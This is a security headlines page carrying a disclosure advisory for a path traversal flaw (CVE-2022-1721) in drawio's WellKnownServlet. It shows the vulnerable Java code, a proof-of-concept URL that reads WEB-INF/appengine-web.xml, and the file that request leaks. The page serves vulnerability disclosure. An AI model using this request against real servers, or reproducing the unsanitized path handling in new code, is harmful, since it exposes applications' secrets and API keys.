Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-1721: Path Traversal in WellKnownServlet in drawio

Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.

CVE
Open in Source
#xss#web#google#js#git#java

Description

The WellKnownServlet is vulnerable to path traversal. This allows reading local files. For example the files in WEB-INF that contain secrets and API keys can be read.

https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66

        String uri = request.getRequestURI().replace("/.", "/");

        if (uri.toLowerCase().contains(".json"))
        {
            response.setContentType("application/json");
        }

        // Serve whatever was requested from .well-known
        try (InputStream in = getServletContext().getResourceAsStream(uri))
        {
            if (in == null)
            {
                response.sendError(404);
                return;
            }
            
            byte[] buffer = new byte[8192];
            int count;

            while ((count = in.read(buffer)) > 0)
            {
                response.getOutputStream().write(buffer, 0, count);
            }
            
            response.getOutputStream().flush();
            response.getOutputStream().close();
        }

Proof of Concept

Access the following URL (replace <host> with the actual host of the web application).

<host>/.well-known/.../WEB-INF/appengine-web.xml

This will disclose the contents of appengine-web.xml:

<?xml version="1.0" encoding="utf-8"?>
<appengine-web-app xmlns="http://appengine.google.com/ns/1.0">

  <threadsafe>true</threadsafe>
  <sessions-enabled>false</sessions-enabled>
  <runtime>java8</runtime>

  <!-- Configure java.util.logging -->
  <system-properties>
    <property name="java.util.logging.config.file" value="WEB-INF/logging.properties"/>
  </system-properties>

  <!-- Path patterns not supported in production -->
  <static-files>
    <include path="/**">
      <http-header name="Referrer-Policy" value="strict-origin"/>
      <http-header name="Access-Control-Allow-Origin" value="*"/>
      <http-header name="X-XSS-Protection" value="1; mode=block"/>
      <http-header name="X-Content-Type-Options" value="nosniff"/>
    </include>
  </static-files>

  <!-- App engine has conflicting interfaces for javax.cache.CacheManager -->
  <class-loader-config>
    <priority-specifier filename="cache-api-1.1.1.jar"/>
  </class-loader-config>
  
  <instance-class>F1</instance-class>
  <automatic-scaling>
    <max-idle-instances>1</max-idle-instances>
  </automatic-scaling>
</appengine-web-app>

Impact

Read local files of the web application.

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE